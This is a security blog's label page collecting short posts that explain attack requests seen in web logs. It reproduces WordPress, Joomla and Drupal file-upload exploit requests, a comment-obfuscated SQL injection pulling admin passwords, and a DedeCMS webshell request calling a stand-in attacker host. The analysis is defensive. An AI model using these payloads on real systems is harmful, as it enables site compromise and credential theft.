Showing posts with label File Upload. Show all posts
Showing posts with label File Upload. Show all posts

Tuesday, August 30, 2016

Work the Flow File Upload Sample Attack

Saw this web request and thought it was interesting enough to mention. It's the Work the Flow File Upload plugin for Wordpress and it appears to be linked to this 2015 File upload exploit.

POST /wp-content/plugins/work-the-flow-file-upload/public/assets/jquery-file-upload-9.5.0/server/php/index.php HTTP/1.1
Host: mysite.com
Content-Length: 270
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=18301442f2ce4a0aba32c60e4bf2f5db
action=upload
files=wp-classes.php

Patch your wordpress plugins or get rid of them if you don't use them!

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , ,

Monday, August 29, 2016

Wordpress Gravity Forms File Upload Attempt

Here is a sample from this weekend of last year's Gravity Forms Wordpress file upload exploit

POST/?gf_page=upload HTTP/1.1
Host: mysite.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Length: 2476
Content-Type: multipart/form-data; boundary=3196e7ebf0e84b8499c31b44f2f68dd8
gform_unique_id=../../../../
name=css.php5
form_id=1
field_id=3
file=11.jpg

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , ,

Thursday, August 18, 2016

SQL Injection Example on Five Star Review

I pasted a few interesting web attacks from very recent logs. Thought it'd be interesting to run through some of them.

GET/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` &_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1

This first attack looks like it's related to the Five Star Review System , possibly an older well known vulnerability on a company which appears to provide websites with review capabilities. So if you just add their php code to your website, you too can have your customers review your products, provide feedback, rank it with stars, etc. The problem it appears is there must be a SQL injection vulnerability in the _FILES query string parameter. This parameter must not be getting sanitized properly and thus an attacker is able to execute SQL code against the database behind this website. You'll notice in red some values that sorta look like SQL code. Now it looks like in order to get the exploit to work they have to escape characters thus the reason you see @`\'` together to get the correct syntax down to mysql.

' or mid=' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'

Next it's interesting to see the /**/ because that looks like comments, right? They can be ignored, right? WRONG! /*!50000 actually has significance in MySQL. The "50000" refers to a MySQL version, and thus it tells MySQL that only version 5.0.0 and above should run this command.

' /*!50000union*//*!50000select*/1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'

Thus there's actually a union and select statement hidden in there !

' union select 1,2,3,
(
select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1
)
,5,6,7,8,9'

Now you can see from here that the attacker has knowledge that the sql query must return 9 column, thus the reason in his union select he's padded it with 8 extra integer value, and only the 4th column is of any interest, so that must be the column that the website displays in html to the browser so that attacker can see his results.

select CONCAT(0x7c,userid,0x7c,pwd)
from __admin
limit 0,1

Thus we're down to just that interesting column. You can see it concatenates 0x7c which per the hex conversion is a pipe (|) with the userid and password. Thus you may see as a result something like '|myusername|mypassword' returned to the screen. Finally notice that it's query the __admin table which must be were the administrator usernames and passwords like for the Five Star Review system and it's only pulling a few records, in this case it says in the limit clause 0,1 which means start at record 0 (the 1st one) and pull 1 record. So it's just returning the top record which likely is the administrator of the Five Start Review system.

GET/admin/_content/_about/aspcms_aboutedit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1 HTTP/1.1

This is a very similar attack as the one described in detail above. I'm guessing this is related to the ASP CMS (content management system) just based on the table they are tyring to grab records from (aspcms_user). Notice they are looking for userid=1 which is likely the system administrator record.

Remember to prevent SQL injection use parameterized queries so that data types cannot change and apostrophes cannot be escaped. Also use a sanitization library that escapes/encodes bad characters. Also make sure to do server side validation, if a parameter is supposed to take an ID # ... then only allow integers! If it's supposed to be a file type then make sure it matches a regex even as simple as as .*\..{1,3}.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels: , , , , ,

Monday, June 6, 2016

vote.api.php File upload request

I saw this http post request

POST / HTTP/1.1
Host: www.mysite.com
Content-Type: multipart/form-data; boundary=----------------5UQqAg13N91D45i2
DNT: 1
Cache-Control: no-cache
Pragma: no-cache
submit=Upload Image
Name=cache.php
F1l3=vote.api.php

Figured it's likely some CMS file upload vulnerability somebody is trying to exploit. Just by googling I wonder if it's related to the Drupal Voting API but I cannot be certain. Whatever it is, it appears if you post to the url and then pass in the file you want to upload as a post parameter the file will get uploaded to the server ... thus an attacker would dump a web shell up there.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at No comments:
Labels:

Tuesday, May 31, 2016

A File Upload Vulnerability barrage

I noticed a series of Wordpress/Joomla file upload attacks from a single IP address / attacker in a short period of time. Some of the requests were listed here. What I found interesting was not the fact that most were well known Wordpress vulnerabilities that are still unpatched by many web administrators. What I found interesting was the methodology of the malicious actor. It's likely what they have written is some sort of script/automated scanning tool, perhaps even a botnet or something that is doing this automatically. I envision that the code/script doing this probably has an array or list of well known Wordpress file upload vulnerabilities. It's probably a flexible dynamic list so that as soon as the attacker hear's about a new Wordpress file upload vulnerabilty, he can literally just add a URL path and a post parameter for the file name, and the script/botnet will probably just start scanning and attacking the internet trying to upload malicious files. Then there is likely a follow-up script that runs shortly after that connects to the uploaded backdoors and validates which ones were successful or not. In all the cases below the attacker uploads the same malicious file/name upfilees.php so that the attacker can easily go back later and determine if this was a device they compromised or not. The backdoor is probably a web shell that gives them full access to the web server's file system and the ability to run commands against the web server. Below I did my best to research a few of the attacks seen in this cycle and explain a bit.

yiw_contact[]=upfilees.php
yiw_action=sendemail

In the above HTTP Post, there were 2 parameters that started with yiw. This indicates that the attacker is likely trying to explpoit the Beauty & Clean Theme File Upload Wordpress Vulnerability which is literally as simple as posting your backdoor file to the contact field via the sendmail action. If it succeeds, your file has been uploaded to the web server.

POST/uploadify/uploadify.php
Filedata=upfilees.php

In the next HTTP Post, the attacker is likely attempting to exploit the Event Calendar Arbitrary Wordpress File Upload Vulnerability which is also as simple as passing the file you wanted uploaded as a post parameter to the uploadify.php page. Again, if successful, the attacker just uploaded a php web page to your server and can now do whatever they please.

POST/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass=
Filedata=upfilees.php.suspected
Filename=send.php.suspected

In the next HTTP Post, the attacker is trying to exploit the tinybrowser Remote File Upload Joomla Vulnerability which is another simple vulnerability that involves posting the file you want uploaded as a parameter to the upload_file.php page. We're getting a bit repetitive and non-creative in these vulnerabilities, aren't we?

update_file=upfilees.php
action=revslider_ajax_action

In the next HTTP Post, the attacker is trying to exploit the RevSlider Wordpress File Upload Vulnerability which again requires nothing more than chosing the right action parameter and posting the file, and guess what the web server will be compromised with a nice php backdoor. Oops.

POST /sites/all/libraries/elfinder/php/connector.minimal.php
upload[]=upfilees.php
cmd=upload

In the next HTTP Post, the attacker appears to just be looking for poorly configured systems that have purposely enabled the ELFinder File Manager feature which allows you to remotely manage your web server's file system. Hmmm, can that be exploited? Yep, just post the upload command and your backdoor, and the attacker is in business.

POST /license.php
filename=upfilees.php

The final attack, I believe may be just a standard filename/location that certain attackers or botnets use to exploit systems. They probably exploited this server at some point, and added a backdoor called 'license.php' which allows arbirary file upload. So this attacker is just taking advantage of another attacker's prior compromise of this device. Easy pickings if it exists.

Wordpress & Joomla plugins should not be trusted (like anything else for that matter) and should only be added if absolutely needed. If you do need them, then you better be certain to keep them patched and updated. If you have a plugin that is really not necessary, please, please, please remove those extraneous plugins as otherwise they're going to open up huge ugly gaping holes in your security posture.

More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. php injection ali.txt walk-thru


Top Github Contributions
  1. Qualys Scantronitor 2.0


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at 1 comment:
Labels: , , ,

Thursday, December 17, 2015

DedeCMS File Upload vuln real example

Saw this attack below that appears to be targted at China's popular CMS dedeCMS.

HEAD /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php

It appears that if this vulnerable page was available and exposed and not patched then the attacker can gain remote access per this blog i read Above is step 1 in the process which Clears the contents of config_update.php, which is likely an important file for the CMS and if empty now the guards are down on the site. Then the 2nd step it says is that the attacker will send a similar request that Create local HTTP services like this below.

GET /install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://BADGUYIP:BADGUYPORT/

And your webshell would now live here

GET /install/hello.php

and your site is owned.



More about neonprimetime


Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. php injection walk-thru
  3. vbulletin rce walk-thru


Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.
Posted by at 2 comments:
Labels: , ,
Subscribe to: Posts (Atom)